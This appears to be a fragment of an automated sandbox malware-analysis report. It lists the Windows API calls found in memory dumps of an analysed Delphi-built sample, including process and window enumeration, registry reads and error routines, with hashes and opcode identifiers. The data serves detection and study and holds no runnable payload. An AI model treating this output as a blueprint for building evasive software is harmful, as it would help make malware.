                                                                                                        • Instruction Fuzzy Hash: B1617F30B001289BDB00EBB9FD516DE7AB6AB88304FD1907BB101DB346DA3DD949975D
                                                                                                        APIs
                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004321ED
                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00432209
                                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00432242
                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004322CE
                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004322ED
                                                                                                        • VariantCopy.OLEAUT32(?), ref: 00432322
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                        • String ID:
                                                                                                        • API String ID: 351091851-3916222277
                                                                                                        • Opcode ID: 287d018db1ed06f337db09492564644d5890f8cdaa2b2e6e0ed5f9d3aff5ee10
                                                                                                        • Instruction ID: 5b189e654ec2a164cf08ff3fe1fa5bda42d96994a9381aa440632436457c8679
                                                                                                        • Opcode Fuzzy Hash: 287d018db1ed06f337db09492564644d5890f8cdaa2b2e6e0ed5f9d3aff5ee10
                                                                                                        • Instruction Fuzzy Hash: 62510F75A0021D9BCB22DB59CD81BDAB3FCAF4C304F0051DAE609E7211D678AF858F68
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252BD
                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252C3
                                                                                                        • GetStdHandle.KERNEL32(000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252D8
                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252DE
                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004252FC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleWrite$Message
                                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                                        • API String ID: 1570097196-2970929446
                                                                                                        • Opcode ID: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                                                                        • Instruction ID: bba3c48ee625c544525bb5478dd2fe844e83fda31baf9900a2c834fa5eb47d56
                                                                                                        • Opcode Fuzzy Hash: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                                                                        • Instruction Fuzzy Hash: D6F0F660B80B20B5EA20B3A47E0AF9E2E585714B14F90538BB160940E2CAFE54C8D639
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252BD
                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E,?,?,?,?,00000002,004253FA,00423BB3,00423BFB), ref: 004252C3
                                                                                                        • GetStdHandle.KERNEL32(000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252D8
                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,0042530C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0042534E), ref: 004252DE
                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004252FC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleWrite$Message
                                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                                        • API String ID: 1570097196-2970929446
                                                                                                        • Opcode ID: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                                                                        • Instruction ID: bba3c48ee625c544525bb5478dd2fe844e83fda31baf9900a2c834fa5eb47d56
                                                                                                        • Opcode Fuzzy Hash: dcbf2f3d7b9242d4721900ac582d9b642c1af0b42a895dc0042be7d523733b8f
                                                                                                        • Instruction Fuzzy Hash: D6F0F660B80B20B5EA20B3A47E0AF9E2E585714B14F90538BB160940E2CAFE54C8D639
                                                                                                        APIs
                                                                                                          • Part of subcall function 0042E498: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                                                                          • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                                                                          • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                                                                          • Part of subcall function 0042E498: LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                                                                        • CharToOemA.USER32(?,?), ref: 0042E667
                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E684
                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E68A
                                                                                                        • GetStdHandle.KERNEL32(000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E69F
                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E6A5
                                                                                                        • LoadStringA.USER32(00000000,0000FFEB,?,00000040), ref: 0042E6C7
                                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0042E6DD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 185507032-0
                                                                                                        • Opcode ID: baea71bdd7c72920dabe1177effcbf5504b31f12a8aae7cd7971186c44ea1b49
                                                                                                        • Instruction ID: f84d6c0ac8f674a6599e0b2749f10f63cfea0163ede0fee5985a43e8fc28d286
                                                                                                        • Opcode Fuzzy Hash: baea71bdd7c72920dabe1177effcbf5504b31f12a8aae7cd7971186c44ea1b49
                                                                                                        • Instruction Fuzzy Hash: 59114FB1205324AAD200EB65EC46F9F77ACAB54704FC0491FB754D60E2DE78D944C76A
                                                                                                        APIs
                                                                                                          • Part of subcall function 0042E498: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                                                                          • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                                                                          • Part of subcall function 0042E498: GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                                                                          • Part of subcall function 0042E498: LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                                                                        • CharToOemA.USER32(?,?), ref: 0042E667
                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E684
                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E68A
                                                                                                        • GetStdHandle.KERNEL32(000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E69F
                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,0042E6F4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0042E6A5
                                                                                                        • LoadStringA.USER32(00000000,0000FFEB,?,00000040), ref: 0042E6C7
                                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0042E6DD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 185507032-0
                                                                                                        • Opcode ID: 401045d8ee95fbdf89e19f6e1ec223ffdeb1ebc428783b2908f96f474aea0da3
                                                                                                        • Instruction ID: f84d6c0ac8f674a6599e0b2749f10f63cfea0163ede0fee5985a43e8fc28d286
                                                                                                        • Opcode Fuzzy Hash: 401045d8ee95fbdf89e19f6e1ec223ffdeb1ebc428783b2908f96f474aea0da3
                                                                                                        • Instruction Fuzzy Hash: 59114FB1205324AAD200EB65EC46F9F77ACAB54704FC0491FB754D60E2DE78D944C76A
                                                                                                        APIs
                                                                                                        • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422CD7
                                                                                                        • LocalFree.KERNEL32(00A8D9C8,00000000,00422D9C), ref: 00422CE9
                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,00A8D9C8,00000000,00422D9C), ref: 00422D0D
                                                                                                        • LocalFree.KERNEL32(00000000,00A8D9C8,00000000,00422D9C), ref: 00422D5E
                                                                                                        • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422D8C
                                                                                                        • RtlDeleteCriticalSection.NTDLL(0051C5CC), ref: 00422D96
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 3782394904-0
                                                                                                        • Opcode ID: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                                                                        • Instruction ID: 51b20bc82c46605137a71ee0876b208d9b0e80c496a26de6aac0e9cff921d01f
                                                                                                        • Opcode Fuzzy Hash: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                                                                        • Instruction Fuzzy Hash: D8218170781610BFD710EBA8EA45B997FE4E719304F914497F400D73A1C6BDB984EB19
                                                                                                        APIs
                                                                                                        • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422CD7
                                                                                                        • LocalFree.KERNEL32(00A8D9C8,00000000,00422D9C), ref: 00422CE9
                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,00A8D9C8,00000000,00422D9C), ref: 00422D0D
                                                                                                        • LocalFree.KERNEL32(00000000,00A8D9C8,00000000,00422D9C), ref: 00422D5E
                                                                                                        • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422D8C
                                                                                                        • RtlDeleteCriticalSection.NTDLL(0051C5CC), ref: 00422D96
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 3782394904-0
                                                                                                        • Opcode ID: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                                                                        • Instruction ID: 51b20bc82c46605137a71ee0876b208d9b0e80c496a26de6aac0e9cff921d01f
                                                                                                        • Opcode Fuzzy Hash: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                                                                        • Instruction Fuzzy Hash: D8218170781610BFD710EBA8EA45B997FE4E719304F914497F400D73A1C6BDB984EB19
                                                                                                        APIs
                                                                                                          • Part of subcall function 004243D4: GetKeyboardType.USER32(00000000), ref: 004243D9
                                                                                                          • Part of subcall function 004243D4: GetKeyboardType.USER32(00000001), ref: 004243E5
                                                                                                        • GetCommandLineA.KERNEL32 ref: 004279E7
                                                                                                        • GetVersion.KERNEL32 ref: 004279FB
                                                                                                        • GetVersion.KERNEL32 ref: 00427A0C
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00427A48
                                                                                                          • Part of subcall function 00424404: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                                                                          • Part of subcall function 00424404: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                                                                          • Part of subcall function 00424404: RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                                                                        • GetThreadLocale.KERNEL32 ref: 00427A28
                                                                                                          • Part of subcall function 004278B8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042791E), ref: 004278DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3734044017-0
                                                                                                        • Opcode ID: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                                                                        • Instruction ID: d1f10ed7233c6c26cc9ab7a9211c78b7d6b8eafa5dd651b04747b7567f40d78a
                                                                                                        • Opcode Fuzzy Hash: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                                                                        • Instruction Fuzzy Hash: 130156B0684261D9E714FBB1B90A38D3E50BB25308FC1955F944086262E7BE014CEB7E
                                                                                                        APIs
                                                                                                          • Part of subcall function 004243D4: GetKeyboardType.USER32(00000000), ref: 004243D9
                                                                                                          • Part of subcall function 004243D4: GetKeyboardType.USER32(00000001), ref: 004243E5
                                                                                                        • GetCommandLineA.KERNEL32 ref: 004279E7
                                                                                                        • GetVersion.KERNEL32 ref: 004279FB
                                                                                                        • GetVersion.KERNEL32 ref: 00427A0C
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00427A48
                                                                                                          • Part of subcall function 00424404: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                                                                          • Part of subcall function 00424404: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                                                                          • Part of subcall function 00424404: RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                                                                        • GetThreadLocale.KERNEL32 ref: 00427A28
                                                                                                          • Part of subcall function 004278B8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042791E), ref: 004278DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3734044017-0
                                                                                                        • Opcode ID: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                                                                        • Instruction ID: d1f10ed7233c6c26cc9ab7a9211c78b7d6b8eafa5dd651b04747b7567f40d78a
                                                                                                        • Opcode Fuzzy Hash: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                                                                        • Instruction Fuzzy Hash: 130156B0684261D9E714FBB1B90A38D3E50BB25308FC1955F944086262E7BE014CEB7E
                                                                                                        APIs
                                                                                                        • FindWindowW.USER32(00000000,?), ref: 004E75A6
                                                                                                          • Part of subcall function 004CF5C8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF5D9
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004E7557
                                                                                                          • Part of subcall function 004CF648: Process32NextW.KERNEL32(00000000,?), ref: 004CF659
                                                                                                        • EnumWindows.USER32(004E7268,?), ref: 004E76D1
                                                                                                          • Part of subcall function 004CF628: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004CF639
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004E76C3
                                                                                                          • Part of subcall function 00425D80: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00425CC7
                                                                                                          • Part of subcall function 00425D80: SysFreeString.OLEAUT32(?), ref: 00425CD9
                                                                                                          • Part of subcall function 00425C04: SysReAllocStringLen.OLEAUT32(-00000008,"lB,?), ref: 00425C1A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocCloseHandleProcess32$CreateEnumFindFirstFreeNextSnapshotToolhelp32WindowWindows
                                                                                                        • String ID: 4rN
                                                                                                        • API String ID: 2697489950-1347347389
                                                                                                        • Opcode ID: f194a714a7efd85bda473ecfc0a6603ba410595ee8a9a87fd8048d74f52a551e
                                                                                                        • Instruction ID: 81800b201d129eb233c86aa27584eaf6e594e3464967b80929217755b8ff651a
                                                                                                        • Opcode Fuzzy Hash: f194a714a7efd85bda473ecfc0a6603ba410595ee8a9a87fd8048d74f52a551e
                                                                                                        • Instruction Fuzzy Hash: 1AB1B6347042598BCB20FB26DC85ABE77B6AF44315F5045ABE80497355E73CEE458B88
                                                                                                        APIs
                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424C8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID: (B$<"B$<B
                                                                                                        • API String ID: 3192549508-3130809168
                                                                                                        • Opcode ID: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                                                                        • Instruction ID: ba7fb83052fc80cd7703b70a966ced7e32abaed02e915777dc773f657e1679cb
                                                                                                        • Opcode Fuzzy Hash: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                                                                        • Instruction Fuzzy Hash: 9041A0707042219FD720DF19E884B2BBBE5EFC8354FA6855AE84887351C739EC45CB69
                                                                                                        APIs
                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424C8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID: (B$<"B$<B
                                                                                                        • API String ID: 3192549508-3130809168
                                                                                                        • Opcode ID: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                                                                        • Instruction ID: ba7fb83052fc80cd7703b70a966ced7e32abaed02e915777dc773f657e1679cb
                                                                                                        • Opcode Fuzzy Hash: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                                                                        • Instruction Fuzzy Hash: 9041A0707042219FD720DF19E884B2BBBE5EFC8354FA6855AE84887351C739EC45CB69
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                                                                        • RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                        • API String ID: 3677997916-4173385793
                                                                                                        • Opcode ID: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                                                                        • Instruction ID: f32d36fbebf6c4c7954b05bf0a9ffb8b8aa37f3b827fee81d15b76f4adfa98af
                                                                                                        • Opcode Fuzzy Hash: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                                                                        • Instruction Fuzzy Hash: 0601D875B00318BAE711EBE0ED42FBD77FCEB48700F9000A6BA00D6580E6B96A15D76C
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                                                                        • RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                        • API String ID: 3677997916-4173385793
                                                                                                        • Opcode ID: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                                                                        • Instruction ID: f32d36fbebf6c4c7954b05bf0a9ffb8b8aa37f3b827fee81d15b76f4adfa98af
                                                                                                        • Opcode Fuzzy Hash: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                                                                        • Instruction Fuzzy Hash: 0601D875B00318BAE711EBE0ED42FBD77FCEB48700F9000A6BA00D6580E6B96A15D76C
                                                                                                        Memory Dump Source
